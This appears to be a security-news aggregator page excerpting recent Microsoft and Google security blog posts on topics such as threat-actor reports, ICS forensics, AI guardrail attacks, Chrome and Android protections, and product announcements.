For example, it’s very common for Android applications to read their server settings from the shared_prefs directory.

Recommendations
Recognizing that this vulnerability pattern may be widespread, we shared our findings with Google’s Android Application Security Research team.

We collaborated with Google to author guidance for Android application developers to help them recognize and avoid this pattern.

2 days, 2 hours ago @ microsoft.com
Investigating industrial control systems using Microsoft’s ICSpector open-source framework

Challenges in ICS forensics
ICS forensics differs from standard IT forensics because ICS environments possess distinctive features that distinguish them.

In contrast, forensics in OT environments involves analyzing ICS data, including data from sensors and controllers used in manufacturing and industrial settings.

Specialized tools and techniques have started to emerge to address the unique challenges of conducting investigations in ICS environments.

Defender for IoT, or any other OT security solution, can help with both proactive and reactive OT incident response.

To get started with OT security, watch the “Introduction to ICS/OT Security” webinar series, hosted by Microsoft Security Commu…

1 week, 1 day ago @ techcommunity.microsoft.com
5 ways a CNAPP can strengthen your multicloud security environment

Insight #3: Effective cybersecurity takes a good partner
Keeping user needs in mind, Microsoft has its own CNAPP solution—Microsoft Defender for Cloud.

Operationalizing Microsoft Defender for Cloud takes both integrating it into daily operations and satisfying your users’ needs by continuously evolving cloud security.

Strengthening the SOC even further is a new Microsoft Defender for Cloud integration with Microsoft Defender XDR.

The future holds significant promise for CNAPP, and Microsoft is leading in this effort with solutions like Microsoft Defender for Cloud.

Also, follow us on LinkedIn (Microsoft Security)…

1 week, 2 days ago @ microsoft.com
New Microsoft Incident Response guide helps simplify cyberthreat investigations

To help like-minded defenders tackle this difficult task, Microsoft Incident Response experts have created a guide on using Windows Internals for forensic investigations.

Guidance for Incident Responders The new guide from the Microsoft Incident Response team helps simplify forensic investigations.

Understanding these artifacts will strengthen your ability to conduct Windows forensic analysis.

Shimcache’s forensic evolution: The Shimcache has long served as a source of forensic information, particularly as evidence of program execution.

Forensic insights with SRUM: SRUM’s tracking of application execution, network activity, and resource consumption is a boon for forensic analysts.

1 week, 3 days ago @ microsoft.com
Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials

Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks.

Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as CVE-2023-23397.

In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities.

Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East.

To hear stories and insights f…

1 week, 4 days ago @ microsoft.com
Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters

Microsoft recently uncovered an attack that exploits new critical vulnerabilities in OpenMetadata to gain access to Kubernetes workloads and leverage them for cryptomining activity.

Attack flow
For initial access, the attackers likely identify and target Kubernetes workloads of OpenMetadata exposed to the internet.

Once they identify a vulnerable version of the application, the attackers exploit the mentioned vulnerabilities to gain code execution on the container running the vulnerable OpenMetadata image.

In this specific case, the attackers’ actions triggered Microsoft Defender for Containers alerts, identifying the malicious activity in the container.

Microsoft Defender Cloud Security Pos…

2 weeks, 2 days ago @ microsoft.com
New Microsoft guidance for the DoD Zero Trust Strategy

Today, we are excited to announce Zero Trust activity-level guidance for DoD Components and DIB partners implementing the DoD Zero Trust Strategy.

In this blog, we’ll review the DoD Zero Trust Strategy and discuss how our new guidance helps DoD Components and DIB partners implement Zero Trust.

We’ll cover the Microsoft Zero Trust platform and relevant features for meeting DoD’s Zero Trust requirements, and close with real-world DoD Zero Trust deployments.

Microsoft supports the DoD’s Zero Trust Strategy
The DoD released its formal Zero Trust Strategy in October 2022.[1] The strategy is a security framework and mindset that sets a path for achieving Zero Trust.

There are 152 Zero Trust activitie…

2 weeks, 3 days ago @ microsoft.com
Microsoft recognized as a Leader in the Forrester Wave™: Workforce Identity Platform, Q1 2024

We’re thrilled to announce that Forrester has recognized Microsoft as a Leader in the Forrester Wave™: Workforce Identity Platforms, Q1 2024 report.

In The Forrester Wave™ report, Forrester recognized Microsoft Entra for its adaptive policy engine, well-integrated identity lifecycle management, and end-to-end approach to identity threat detection.

Bookmark the Microsoft Entra blog to keep up with our expert coverage on workforce identity matters.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

Forrester Wave™: Workforce Identity Platforms, Q1 2024, Geoff Cairns, Merritt Maxim, Lok Sze Sung, Peter Harrison.

2 weeks, 4 days ago @ microsoft.com
How Microsoft discovers and mitigates evolving attacks against AI guardrails

You can read more about Microsoft’s approach to securing generative AI with new tools we recently announced as available or coming soon to Microsoft Azure AI Studio for generative AI app developers.

While Crescendo attacks were a surprising discovery, it is important to note that these attacks did not directly pose a threat to the privacy of users otherwise interacting with the Crescendo-targeted AI system, or the security of the AI system, itself.

Microsoft Azure AI Content Safety is an example of this approach.

Microsoft’s own procedure is explained here: Microsoft AI Bounty.

3 weeks, 1 day ago @ microsoft.com
Explore Microsoft’s AI innovations at RSA Conference 2024

Join us a day early, on Sunday, May 5, 2024, at Microsoft Pre-Day to kick off RSA Conference 2024, and hear directly from our Microsoft Security Business leaders, including Vasu Jakkal, Corporate Vice President, Microsoft Security Business, and Charlie Bell, Executive Vice President, Microsoft Security.

Plus, view live demos at a variety of Microsoft sessions happening throughout the conference in breakout rooms and at our booth #6044N.

They’ll reflect on the latest developments in cybersecurity, AI, and how the global community of cyber professionals can work together for a more secure future.

Check out one or all of our Microsoft Security sessions included in the RSA Conference agenda.

Vi…

4 weeks, 1 day ago @ microsoft.com
Get end-to-end protection with Microsoft’s unified security operations platform, now in public preview

Today, I am excited to announce the public preview of our unified security operations platform.

Onboarding a Microsoft Sentinel workspace only takes a few minutes, and customers can continue to use their Microsoft Sentinel in Azure.

Unified security operations platform
The new platform brings together the capabilities of XDR and SIEM.

Fortunately, the Microsoft Security Exposure Management solution, built right into the new unified platform experience, consolidates silos into a contextual and risk-based view.

If you’d like to join the public preview, view the prerequisites and how to connect your Microsoft Sentinel workspace.

1 month ago @ microsoft.com
Microsoft Priva announces new solutions to help modernize your privacy program

Microsoft Priva Privacy Assessments
Build the foundation of your privacy posture with Microsoft Priva Privacy Assessments—a solution that automates the discovery, documentation, and evaluation of personal data use across your entire data estate.

Embed your custom privacy risk framework into each assessment to programmatically identify the factors contributing to privacy risk.

Microsoft Priva Privacy Risk Management
Microsoft Priva Privacy Risk Management is here to empower you to simplify the identification of unstructured personal data usage.

Key features
Efficiently manage subject rights requests: Streamline the fulfillment of subject rights request tasks using configurable settings within …

1 month ago @ microsoft.com
The foundation for responsible analytics with Microsoft Purview

In 2022, we introduced Microsoft Purview, a comprehensive set of solutions that let you secure, govern, and ensure compliance across your data estate.

Confidently activate your data with modern data governance
We are thrilled to introduce the new Microsoft Purview Data Governance experience.

This new reimagined software as a service (SaaS) solution offers sophisticated yet simple business-friendly interaction, integration across your multicloud data estate, and actionable insights that help data leaders to responsibly unlock business value within their data estate.

If you’re attending, don’t miss the…

1 month, 1 week ago @ microsoft.com
Google Online Security Blog
last post 2 weeks, 1 day ago
Prevent Generative AI Data Leaks with Chrome Enterprise DLP

Generative AI has emerged as a powerful and popular tool to automate content creation and simple tasks.

In this blog post, we'll explore reporting and enforcement policies that enterprise security teams can implement within Chrome Enterprise Premium for data loss prevention (DLP).

Chrome Enterprise DLP rules give IT admins granular control over browser activities, such as entering financial information in Gen AI websites.

As enterprises work through their policies and processes involving GenAI, Chrome Enterprise Premium empowers them to strike the balance that works best.

Learn more about how Chrome Enterprise can secure businesses just like yours here.

2 weeks, 1 day ago @ security.googleblog.com
How we built the new Find My Device network with user security and privacy in mind

How location crowdsourcing works on the Find My Device network
The Find My Device network locates devices by harnessing the Bluetooth proximity of surrounding Android devices.

Nearby Android devices participating in the Find My Device network report the location of the Bluetooth tag.

With end-to-end encrypted location data, Google cannot decrypt, see, or otherwise use the location data.

The Find My Device network is also compliant with the integration version of the joint industry standard for unwanted tracking.

We have an unwavering commitment to continue to improve user protections on Find My Device and prioritize user safety.

3 weeks, 4 days ago @ security.googleblog.com
Google Public DNS’s approach to fight against cache poisoning attacks

In this post, we will look at DNS cache poisoning attacks and how Google Public DNS addresses the risks associated with them.

DNS Cache Poisoning Attacks
DNS lookups in most applications are forwarded to a caching resolver (which could be local or an open resolver like.

For an excellent introduction to cache poisoning attacks, please see “An Illustrated Guide to the Kaminsky DNS Vulnerability”.

Cache poisoning mitigations in Google Public DNS
Improving DNS security has been a goal of Google Public DNS since our launch in 2009.

To enhance DNS security, we recommend that DNS server operators support one or more of the security mechanisms described here.

1 month ago @ security.googleblog.com
Address Sanitizer for Bare-metal Firmware

Address Sanitizer (ASan) overview
Address Sanitizer is a compiler-based instrumentation tool used to identify invalid memory access operations during runtime.

The KASan runtime routines implemented in the Linux kernel serve as a great example of how to define a KASan runtime for targets which aren’t supported by default with -fsanitize=address.

Memory access check
The routines __asan_loadXX_noabort and __asan_storeXX_noabort perform verification of memory access at runtime.

This routine takes as input a target memory address and sets the corresponding byte in shadow memory to the value of YY.

Essentially, we would need to instrument the memory allocator with the code which unpoisons KASan sha…

1 month, 1 week ago @ security.googleblog.com
Real-time, privacy-preserving URL protection

That’s why we're excited to announce a new version of Safe Browsing that will provide real-time, privacy-preserving URL protection for people using the Standard protection mode of Safe Browsing in Chrome.

Introducing real-time, privacy-preserving Safe Browsing
How it works
In order to transition to real-time protection, checks now need to be performed against a list that is maintained on the Safe Browsing server.

With OHTTP, Safe Browsing does not see your IP address, and your Safe Browsing checks are mixed amongst those sent by other Chrome users.

Since the privacy server doesn’t know the private key, it cannot decrypt the hash prefixes, which offers privacy from the privacy server itself.

I…

1 month, 2 weeks ago @ security.googleblog.com
Vulnerability Reward Program: 2023 Year in Review

To further our engagement with top security researchers, we also hosted our yearly security conference ESCAL8 in Tokyo.

Android and Google Devices
In 2023, the Android VRP achieved significant milestones, reflecting our dedication to securing the Android ecosystem.

The Google Play Security Reward Program continued to foster security research across popular Android apps on Google Play.

All of this resulted in $2.1M in rewards to security researchers for 359 unique reports of Chrome Browser security bugs.

Thank you to the Chrome VRP security researcher community for your contributions and efforts to help us make Chrome more secure for everyone!

1 month, 3 weeks ago @ security.googleblog.com
Secure by Design: Google’s Perspective on Memory Safety

The latest news and insights from Google on security and safety on the Internet

2 months ago @ security.googleblog.com
Piloting new ways of protecting Android users from financial fraud

Google Play, for example, carries out rigorous operational reviews to ensure app safety, including proper high-risk API use and permissions handling.

We recently launched enhanced Google Play Protect real-time scanning to help better protect users against novel malicious Internet-sideloaded apps.

This feature, now deployed on Android devices with Google Play Services in India, Thailand, Singapore and Brazil, has already made a significant impact on user safety.

To help better protect Android users from these financial fraud attacks, we are piloting enhanced fraud protection with Google Play Protect.

Our commitment to protecting Android users
We believe industry collaboration is essential to …

2 months, 3 weeks ago @ security.googleblog.com
Improving Interoperability Between Rust and C++

At the time, Rust was already in wide use across Android and other Google products.

Our announcement emphasized our commitment to improving the security reviews of Rust code and its interoperability with C++ code.

Rust is one of the strongest tools we have to address memory safety security issues.

We’re also furthering our existing commitment to the open-source Rust community by aggregating and publishing audits for Rust crates that we use in open-source Google projects.

As these improvements have continued, we’ve seen a reduction in the barriers to adoption and accelerated adoption of Rust.

2 months, 4 weeks ago @ security.googleblog.com
UN Cybercrime Treaty Could Endanger Web Security

Google takes the threat of cybercrime very seriously, and dedicates significant resources to combating it.

Such safeguards aren’t just important to ensuring free expression and human rights, they are also critical to protecting web security.

The Cybercrime Treaty should not criminalize the work of legitimate cybersecurity researchers and penetration testers, which is designed to protect individual systems and the web as a whole.

At the same time, Member States should avoid attempts to criminalize activities that raise significant freedom of expression issues, or that actually undercut the treaty’s goal of reducing cybercrime.

We urge Member States to heed calls from civil society groups to …

3 months ago @ security.googleblog.com
Scaling security with AI: from detection to solution

The AI world moves fast, so we’ve been hard at work keeping security apace with recent advancements.

One of our approaches, in alignment with Google’s Safer AI Framework (SAIF), is using AI itself to automate and streamline routine and manual security tasks, including fixing security bugs.

Last year we wrote about our experiences using LLMs to expand vulnerability testing coverage, and we’re excited to share some updates.

We’ll also show you how we’re using AI to speed up the bug patching process.

If you’re interested in using LLMs to patch bugs, be sure to read our paper on building an AI-powered patching pipeline.

3 months ago @ security.googleblog.com
Effortlessly upgrade to Passkeys on Pixel phones with Google Password Manager

This is why the Pixel team has been especially excited about passkeys—the easier, safer alternative to passwords.

As part of last December’s Pixel Feature Drop, we introduced a new feature to Google Password Manager: passkey upgrades.

With this new feature, Google Password Manager will let you discover which of your accounts support passkeys, and help you upgrade with just a few taps.

This new passkey upgrade experience is now available on Pixel phones (starting from Pixel 5a) as well as Pixel Tablet.

Google Password Manager will incorporate these updates for other platforms in the future.

3 months ago @ security.googleblog.com
MiraclePtr: protecting users from use-after-free vulnerabilities on more platforms

Welcome back to our latest update on MiraclePtr, our project to protect against use-after-free vulnerabilities in Google Chrome.

Our analysis is based on two primary information sources: incoming vulnerability reports and crash reports from user devices.

MiraclePtr effectively mitigated 57% of these use-after-free vulnerabilities in privileged processes, exceeding our initial estimate of 50%.

Impressively, five of the six were discovered while investigating MiraclePtr crash reports!

Conclusion
In summary, MiraclePtr has proven to be effective in mitigating use-after-free vulnerabilities and enhancing the overall security of the Chrome browser.

3 months, 3 weeks ago @ security.googleblog.com
Hardening cellular basebands in Android

Beyond security, addressing the issues uncovered by these sanitizers improves code health and overall stability, reducing resources spent addressing bugs in the future.

Baseband security and exploitation have been a recurring theme in security conferences for the last decade.

For example, we consider vulnerabilities allowing Remote Code Execution (RCE) in the cellular baseband to be of CRITICAL severity.

Aside from uncovering security vulnerabilities, this stage is highly effective at uncovering code quality and stability bugs that could result in instability on user devices.

There is no need to rewrite everything in Rust, as Rust provides strong C FFI support and easily interfaces with ex…

4 months, 3 weeks ago @ security.googleblog.com
Improving Text Classification Resilience and Efficiency with RETVec

Systems such as Gmail, YouTube and Google Play rely on text classification models to identify harmful content including phishing attacks, inappropriate comments, and scams.

To help make text classifiers more robust and efficient, we’ve developed a novel, multilingual text vectorizer called RETVec (Resilient & Efficient Text Vectorizer) that helps models achieve state-of-the-art classification performance and drastically reduces computational cost.

RETVec-based Gmail Spam filter improvements.

RETVec is a novel open-source text vectorizer that allows you to build more resilient and efficient server-side and on-device text classifiers.

The Gmail spam filter uses it to help protect Gmail inboxe…

5 months ago @ security.googleblog.com